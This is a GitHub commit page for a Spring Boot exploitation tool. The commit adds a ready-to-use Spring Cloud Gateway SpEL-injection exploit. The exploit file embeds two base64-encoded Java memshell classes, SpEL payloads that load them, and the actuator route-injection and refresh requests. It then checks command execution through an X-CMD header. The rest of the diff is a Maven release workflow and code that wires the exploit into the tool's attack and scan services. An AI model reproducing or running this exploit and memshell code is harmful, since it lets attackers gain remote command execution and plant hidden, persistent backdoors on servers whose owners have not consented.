Skip to content
This repository has been archived by the owner on Jul 25, 2024. It is now read-only.

Commit

Permalink
更新1.3版本,支持SpringCloudGatewayRCE
Browse files Browse the repository at this point in the history
SummerSec committed Apr 17, 2022

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature. The key has expired.
1 parent f0ac6b0 commit e9dcb1b
Showing 14 changed files with 537 additions and 11 deletions.
61 changes: 61 additions & 0 deletions .github/workflows/maven.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,61 @@
name: Release Maven



on:
push:
tags:
- '*'
#on: [push]



jobs:
build:
runs-on: ubuntu-latest

steps:
- uses: actions/checkout@v2
- name: Set up JDK 1.8
uses: actions/setup-java@v1
with:
distribution: "Liberica"
java-version: 1.8
java-package: jdk+fx
- name: Build with Maven
run:
mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V
- name: Create Release
id: create_release
uses: SummerSec/create-release@master
with:
tag_name: ${{ github.ref }}
release-name: Release ${{ github.ref }}
draft: false
prerelease: false
env:
GITHUB_TOKEN: ${{ secrets.RELEASE }}


- name: Upload a Build Artifact
id: upload-build-artifact
uses: actions/upload-artifact@v2.3.1
with:
# Artifact name
name: # optional, default is artifact
SPATool-${{steps.create_release.outputs.tag}}-SNAPSHOT-all.jar
# A file, directory or wildcard pattern that describes what to upload
path:
target/*-SNAPSHOT-all.jar
# The desired behavior if no files are found using the provided path.

- name: Auto Upload Release
id: upload-release-asset
uses: actions/upload-release-asset@v1.0.1
env:
GITHUB_TOKEN: ${{secrets.RELEASE}}
with:
upload_url: ${{ steps.create_release.outputs.upload_url }}
asset_path: /home/runner/work/SPATool/SPATool/target/SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar
asset_name: SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar
asset_content_type: application/java-archive
2 changes: 1 addition & 1 deletion pom.xml
Original file line number Diff line number Diff line change
@@ -7,7 +7,7 @@
<groupId>org.example</groupId>
<artifactId>SpringBootExploit</artifactId>
<!-- <packaging>jar</packaging>-->
<version>1.2-SNAPSHOT</version>
<version>1.3-SNAPSHOT</version>


<!-- <properties>-->
65 changes: 65 additions & 0 deletions src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java
Original file line number Diff line number Diff line change
@@ -0,0 +1,65 @@
package com.drops.exp;

import com.drops.utils.HTTPUtils;
import com.drops.utils.StringRandom;

/**
* @ClassName: SpringCloudGatewayRCEEXP
* @Description: TODO
* @Author: Summer
* @Date: 2022/4/17 19:56
* @Version: v1.0.0
* @Description: 参考 https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/
**/
public class SpringCloudGatewayRCEEXP {
final static String mem = "yv66vgAAADQBFAoAPgB9CAB+BwB/CABTBwCACgAFAIEKAIIAgwcAhAoAggCFCgCGAIcKAIYAiAoACACJCgAFAIoIAIsKAIwAjQgASwoABQCOCgCPAIMKAI8AkAoABQCRCABOCACSBwCTCgAXAH0KAI8AlAgAlQcAlggAlwsAmACZCACaCACbCwCcAJ0HAJ4LACEAnwgAoAoAoQCiCgChAKMHAKQKAKUApgoApQCnCgCoAKkKACYAqggAqwoAJgCsCgAmAK0JAK4ArwoAFwCwCgAbALELALIAswcAtAkAtQC2CQC3ALgKALkAugoAMgC7CwC8AJ8JAL0AvggAvwoAoQDACwCyAMEJAMIAwwsAxADFBwDGBwDHAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA9MTmV0dHlNZW1zaGVsbDsBAAhkb0luamVjdAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAVX3ZhbCRkaXNwb3NhYmxlU2VydmVyAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAFHZhbCRkaXNwb3NhYmxlU2VydmVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAHX2NvbmZpZwEABmNvbmZpZwEAEF9kb09uQ2hhbm5lbEluaXQBAAZ0aHJlYWQBAAFpAQABSQEACmdldFRocmVhZHMBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAB3RocmVhZHMBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADbXNnAQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAyAcAyQcAhAcAlgEADW9uQ2hhbm5lbEluaXQBAFcoTHJlYWN0b3IvbmV0dHkvQ29ubmVjdGlvbk9ic2VydmVyO0xpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7TGphdmEvbmV0L1NvY2tldEFkZHJlc3M7KVYBABJjb25uZWN0aW9uT2JzZXJ2ZXIBACJMcmVhY3Rvci9uZXR0eS9Db25uZWN0aW9uT2JzZXJ2ZXI7AQAHY2hhbm5lbAEAGkxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7AQANc29ja2V0QWRkcmVzcwEAGExqYXZhL25ldC9Tb2NrZXRBZGRyZXNzOwEACHBpcGVsaW5lAQAiTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAEE1ldGhvZFBhcmFtZXRlcnMBAAtjaGFubmVsUmVhZAEAPShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9PYmplY3Q7KVYBAANjbWQBAApleGVjUmVzdWx0AQALaHR0cFJlcXVlc3QBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXF1ZXN0OwEAA2N0eAEAKExpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyQ29udGV4dDsHAJ4BAApFeGNlcHRpb25zAQAEc2VuZAEAbShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9TdHJpbmc7TGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7KVYBAAdjb250ZXh0AQAGc3RhdHVzAQAwTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7AQAIcmVzcG9uc2UBAC5MaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0Z1bGxIdHRwUmVzcG9uc2U7AQAKU291cmNlRmlsZQEAEk5ldHR5TWVtc2hlbGwuamF2YQwAQABBAQAMaW5qZWN0LXN0YXJ0AQAQamF2YS9sYW5nL1RocmVhZAEAD2phdmEvbGFuZy9DbGFzcwwAygDLBwDJDADMAM0BABBqYXZhL2xhbmcvT2JqZWN0DADOAM8HANAMANEA0gwA0wDUDADVANYMANcASAEADk5ldHR5V2ViU2VydmVyBwDIDADYANkMANoA2wcA3AwA0wDdDADeANYBAA9kb09uQ2hhbm5lbEluaXQBAA1OZXR0eU1lbXNoZWxsDADfAOABAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IHAOEMAGcA4gEAH3JlYWN0b3IubGVmdC5odHRwVHJhZmZpY0hhbmRsZXIBABBtZW1zaGVsbF9oYW5kbGVyBwDjDADkAOUBACdpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cFJlcXVlc3QMAOYA5wEABVgtQ01EBwDoDADYAOkMANMA6gEAEWphdmEvdXRpbC9TY2FubmVyBwDrDADsAO0MAO4A7wcA8AwA8QDyDABAAPMBAAJcQQwA9AD1DAD2AEgHAPcMAPgAeAwAdAB1DAD5AEEHAPoMAPsA/AEAM2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9EZWZhdWx0RnVsbEh0dHBSZXNwb25zZQcA/QwA/gD/BwEADAEBAQIHAQMMAQQBBQwAQAEGBwEHBwEIDAEJAQoBABl0ZXh0L3BsYWluOyBjaGFyc2V0PVVURi04DADfAQsMAQwBDQcBDgwBDwEQBwERDAESARMBACVpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxEdXBsZXhIYW5kbGVyAQAncmVhY3Rvci9uZXR0eS9DaGFubmVsUGlwZWxpbmVDb25maWd1cmVyAQAQamF2YS9sYW5nL1N0cmluZwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAXamF2YS9sYW5nL3JlZmxlY3QvQXJyYXkBAAlnZXRMZW5ndGgBABUoTGphdmEvbGFuZy9PYmplY3Q7KUkBAANnZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7SSlMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAdnZXROYW1lAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEADWdldFN1cGVyY2xhc3MBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABhpby9uZXR0eS9jaGFubmVsL0NoYW5uZWwBACQoKUxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZTsBACBpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZQEACWFkZEJlZm9yZQEAaShMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZztMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlcjspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAB2hlYWRlcnMBACsoKUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBIZWFkZXJzAQAVKExqYXZhL2xhbmcvU3RyaW5nOylaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEALmlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXMBAAJPSwEAD3ByaW50U3RhY2tUcmFjZQEAJmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEhhbmRsZXJDb250ZXh0AQAPZmlyZUNoYW5uZWxSZWFkAQA8KExqYXZhL2xhbmcvT2JqZWN0OylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uAQAISFRUUF8xXzEBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uOwEAGWlvL25ldHR5L3V0aWwvQ2hhcnNldFV0aWwBAAVVVEZfOAEAGkxqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7AQAYaW8vbmV0dHkvYnVmZmVyL1VucG9vbGVkAQAMY29waWVkQnVmZmVyAQBNKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7KUxpby9uZXR0eS9idWZmZXIvQnl0ZUJ1ZjsBAHUoTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwVmVyc2lvbjtMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXNwb25zZVN0YXR1cztMaW8vbmV0dHkvYnVmZmVyL0J5dGVCdWY7KVYBACxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvRnVsbEh0dHBSZXNwb25zZQEAK2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwSGVhZGVyTmFtZXMBAAxDT05URU5UX1RZUEUBABtMaW8vbmV0dHkvdXRpbC9Bc2NpaVN0cmluZzsBAFUoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7TGphdmEvbGFuZy9PYmplY3Q7KUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQANd3JpdGVBbmRGbHVzaAEANChMamF2YS9sYW5nL09iamVjdDspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZTsBACZpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxGdXR1cmVMaXN0ZW5lcgEABUNMT1NFAQAoTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZUxpc3RlbmVyOwEAHmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZQEAC2FkZExpc3RlbmVyAQBSKExpby9uZXR0eS91dGlsL2NvbmN1cnJlbnQvR2VuZXJpY0Z1dHVyZUxpc3RlbmVyOylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsRnV0dXJlOwAhABcAPgABAD8AAAAFAAEAQABBAAEAQgAAAC8AAQABAAAABSq3AAGxAAAAAgBDAAAABgABAAAAFgBEAAAADAABAAAABQBFAEYAAAAJAEcASAABAEIAAAHDAAQACgAAALUSAksSAxIEA70ABbYABkwrBLYABysBA70ACLYACU0DPh0suAAKogCHLB24AAs6BBkExgB1GQS2AAy2AA0SDrYAD5kAZRkEtgAMEhC2ABE6BRkFBLYAEhkFGQS2ABM6BhkGtgAMtgAUEhW2ABE6BxkHBLYAEhkHGQa2ABM6CBkItgAMtgAUtgAUEha2ABE6CRkJBLYAEhkJGQi7ABdZtwAYtgAZEhpLhAMBp/93pwAHTBIcSyqwAAEAAwCsAK8AGwADAEMAAABaABYAAAAYAAMAGgAPABsAFAAcAB4AHgAoAB8ALwAgAEQAIQBQACIAVgAjAF8AJABuACUAdAAmAH0AJwCPACgAlQApAKMAKgCmAB4ArAAvAK8ALQCwAC4AswAwAEQAAABwAAsAUABWAEkASgAFAF8ARwBLAEwABgBuADgATQBKAAcAfQApAE4ATAAIAI8AFwBPAEoACQAvAHcAUABMAAQAIACMAFEAUgADAA8AnQBTAFQAAQAeAI4AVQBMAAIAsAADAFYAVwABAAMAsgBYAFkAAABaAAAAHgAF/wAgAAQHAFsHAFwHAF0BAAD7AIX4AAVCBwBeAwABAF8AYAACAEIAAAB2AAUABQAAABwsuQAdAQA6BBkEEh4SH7sAF1m3ABi5ACAEAFexAAAAAgBDAAAADgADAAAANgAIADgAGwA5AEQAAAA0AAUAAAAcAEUARgAAAAAAHABhAGIAAQAAABwAYwBkAAIAAAAcAGUAZgADAAgAFABnAGgABABpAAAADQMAYQAAAGMAAABlAAAAAQBqAGsAAwBCAAABEAAEAAYAAABhLMEAIZkAVCzAACFOLbkAIgEAEiO2ACSZADctuQAiAQASI7YAJToEuwAmWbgAJxkEtgAotgAptwAqEiu2ACy2AC06BSorGQWyAC63AC+xpwAKOgQZBLYAMCssuQAxAgBXsQABAAwATQBRABsAAwBDAAAAMgAMAAAAPwAHAEAADABCABoAQwAnAEQAQwBGAE0ARwBOAEsAUQBJAFMASgBYAE0AYABOAEQAAABIAAcAJwAnAGwAWQAEAEMACwBtAFkABQBTAAUAVgBXAAQADABMAG4AbwADAAAAYQBFAEYAAAAAAGEAcABxAAEAAABhAFgATAACAFoAAAAPAAP8AE4HAHJCBwBe+gAGAHMAAAAEAAEAGwBpAAAACQIAcAAAAFgAAAACAHQAdQACAEIAAACUAAYABQAAADa7ADJZsgAzLSyyADS4ADW3ADY6BBkEuQA3AQCyADgSObYAOlcrGQS5ADsCALIAPLkAPQIAV7EAAAACAEMAAAASAAQAAABSABQAUwAkAFQANQBVAEQAAAA0AAUAAAA2AEUARgAAAAAANgBwAHEAAQAAADYAdgBZAAIAAAA2AHcAeAADABQAIgB5AHoABABpAAAADQMAcAAAAHYAAAB3AAAAAQB7AAAAAgB8";


final static String mem1 = "yv66vgAAADQAjgoABgBLCABMCgAGAE0IADAHAE4HAE8HAFAHAFEKAAUAUgoABwBTBwBUCAAyBwBVBwBWCgAOAEsIAFcKAA4AWAcAWQcAWgoAEgBbCABcCgAIAF0KAAsASwoABwBeCABfBwBgCABhBwBiCgBjAGQKAGMAZQoAZgBnCgAcAGgIAGkKABwAagoAHABrBwBsCQBtAG4KACQAbwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAeTFNwcmluZ1JlcXVlc3RNYXBwaW5nTWVtc2hlbGw7AQAIZG9JbmplY3QBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nOwEAFXJlZ2lzdGVySGFuZGxlck1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAOZXhlY3V0ZUNvbW1hbmQBAAtwYXRoUGF0dGVybgEAMkxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm47AQAYcGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uAQBMTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uOwEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAccmVxdWVzdE1hcHBpbmdIYW5kbGVyTWFwcGluZwEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAA21zZwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEADVN0YWNrTWFwVGFibGUHAE8HAFUHAGABABBNZXRob2RQYXJhbWV0ZXJzAQA9KExqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5OwEAA2NtZAEACmV4ZWNSZXN1bHQBAApFeGNlcHRpb25zBwBwAQAKU291cmNlRmlsZQEAIVNwcmluZ1JlcXVlc3RNYXBwaW5nTWVtc2hlbGwuamF2YQwAJwAoAQAMaW5qZWN0LXN0YXJ0DABxAHIBAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQBBb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8MAHMAdAwAdQB2AQAcU3ByaW5nUmVxdWVzdE1hcHBpbmdNZW1zaGVsbAEAEGphdmEvbGFuZy9TdHJpbmcBADZvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm5QYXJzZXIBAAIvKgwAdwB4AQBKb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9QYXR0ZXJuc1JlcXVlc3RDb25kaXRpb24BADBvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm4MACcAeQEAAAwAJwB6DAB7AHwBAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IBABFqYXZhL3V0aWwvU2Nhbm5lcgcAfQwAfgB/DACAAIEHAIIMAIMAhAwAJwCFAQACXEEMAIYAhwwAiACJAQAnb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5BwCKDACLAIwMACcAjQEAE2phdmEvaW8vSU9FeGNlcHRpb24BAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABXBhcnNlAQBGKExqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvdXRpbC9wYXR0ZXJuL1BhdGhQYXR0ZXJuOwEANihbTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3V0aWwvcGF0dGVybi9QYXRoUGF0dGVybjspVgECJChMamF2YS9sYW5nL1N0cmluZztMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9QYXR0ZXJuc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vUmVxdWVzdE1ldGhvZHNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvY29uZGl0aW9uL1BhcmFtc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vSGVhZGVyc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vQ29uc3VtZXNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvY29uZGl0aW9uL1Byb2R1Y2VzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9SZXF1ZXN0Q29uZGl0aW9uOylWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEABG5leHQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAI29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzAQACT0sBACVMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXM7AQA6KExqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czspVgAhAAsABgAAAAAAAwABACcAKAABACkAAAAvAAEAAQAAAAUqtwABsQAAAAIAKgAAAAYAAQAAABQAKwAAAAwAAQAAAAUALAAtAAAACQAuAC8AAgApAAABUwAKAAcAAACSEgJMKrYAAxIEBr0ABVkDEgZTWQQSB1NZBRIIU7YACU0sBLYAChILEgwEvQAFWQMSDVO2AAlOuwAOWbcADxIQtgAROgS7ABJZBL0AE1kDGQRTtwAUOgW7AAhZEhUZBQEBAQEBAbcAFjoGLCoGvQAGWQO7AAtZtwAXU1kELVNZBRkGU7YAGFcSGUynAAdNEhtMK7AAAQADAIkAjAAaAAMAKgAAADYADQAAABYAAwAYACAAGQAlABoANgAbAEQAHABWAB0AaQAeAIYAHwCJACIAjAAgAI0AIQCQACMAKwAAAFIACAAgAGkAMAAxAAIANgBTADIAMQADAEQARQAzADQABABWADMANQA2AAUAaQAgADcAOAAGAI0AAwA5ADoAAgAAAJIAOwA8AAAAAwCPAD0APgABAD8AAAATAAL/AIwAAgcAQAcAQQABBwBCAwBDAAAABQEAOwAAAAEAMgBEAAMAKQAAAGgABAADAAAAJrsAHFm4AB0rtgAetgAftwAgEiG2ACK2ACNNuwAkWSyyACW3ACawAAAAAgAqAAAACgACAAAAJwAaACgAKwAAACAAAwAAACYALAAtAAAAAAAmAEUAPgABABoADABGAD4AAgBHAAAABAABAEgAQwAAAAUBAEUAAAABAEkAAAACAEo=";

final static String NettyMemshell = String.format("#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}", mem);

final static String SpringRequestMappingMemshell = String.format("#{T(org.springframework.cglib.core.ReflectUtils).defineClass('SpringRequestMappingMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping)}",mem1);


public boolean execute(String target, String type){
String endpoint = "s" + StringRandom.getRandomString(5);
String body = String.format("{\n" +
" \"id\": \"%s\",\n" +
" \"filters\": [{\n" +
" \"name\": \"AddResponseHeader\",\n" +
" \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" +
" }],\n" +
" \"uri\": \"%s\",\n" +
" \"order\": 0\n" +
"}", endpoint, type, target);

HTTPUtils.postRequestjson(target , "actuator/gateway/routes/" + endpoint, body).toString();
HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString();
HTTPUtils.getRequest(target , "actuator/gateway/routes/" + endpoint).toString();
HTTPUtils.deleteRequest(target , "actuator/gateway/routes/" + endpoint).toString();
HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString();
String header = "X-CMD: echo "+ endpoint;

String re6 = HTTPUtils.postRequestV1(target, "?cmd=echo "+ endpoint, header).toString();
// System.out.println("re6 = " + re6);
if (re6.toLowerCase().contains(endpoint)){
// System.out.println(String.format("[+] %s inject success", type));
return true;
}
return false;
}

public boolean exp(String target){

if (execute(target,NettyMemshell)){
System.out.println("[+] NettyMemshell inject success");
return true;
}else if (execute(target,SpringRequestMappingMemshell)){
System.out.println("[+] SpringRequestMappingMemshell inject success");
return true;
}
return false;
}

}
15 changes: 12 additions & 3 deletions src/main/java/com/drops/main/AttackService.java
Original file line number Diff line number Diff line change
@@ -96,16 +96,25 @@ public boolean gadgetSend(String target, String vps, String gadget, String[] por

}
}
if (gadget.equalsIgnoreCase("SpringCloudGatewayRCE")){
System.out.println("SpringCloudGatewayRCE " + System.currentTimeMillis());
try {
SpringCloudGatewayRCEEXP exp = new SpringCloudGatewayRCEEXP();
return exp.exp(target);
}catch (Exception e){
e.printStackTrace();
}
}


}catch (Exception e){
e.printStackTrace();
return false;
}

return false;
}


public void setPOCRequest(String target, String vps, String gadget,String echo){

}

}
9 changes: 7 additions & 2 deletions src/main/java/com/drops/poc/SpringBootInfoCheck.java
Original file line number Diff line number Diff line change
@@ -108,11 +108,14 @@ void checkEnvPointV1(String addr){
JolokiaLogbackRCEPOC logbackRCEPOC = new JolokiaLogbackRCEPOC();
JolokiaRealmJNDIRCEPOC realmJNDIRCEPOC = new JolokiaRealmJNDIRCEPOC();
logbackRCEPOC.hasJolokiaLogbackRCE(url);
Boolean f = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url);
boolean f = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url);
if(!f){
H2DatabaseConsoleJNDIRCEPOC h2 = new H2DatabaseConsoleJNDIRCEPOC();
if (!h2.hasH2DatabaseConsoleJNDIRCE(url)){
SpringCloudGatewayRCEPOC gatewayRCEPOC = new SpringCloudGatewayRCEPOC();
if (!gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr)){

}
}

}
@@ -133,10 +136,12 @@ void checkEnvPointV2(String addr){
JolokiaLogbackRCEPOC logbackRCEPOC = new JolokiaLogbackRCEPOC();
JolokiaRealmJNDIRCEPOC realmJNDIRCEPOC = new JolokiaRealmJNDIRCEPOC();
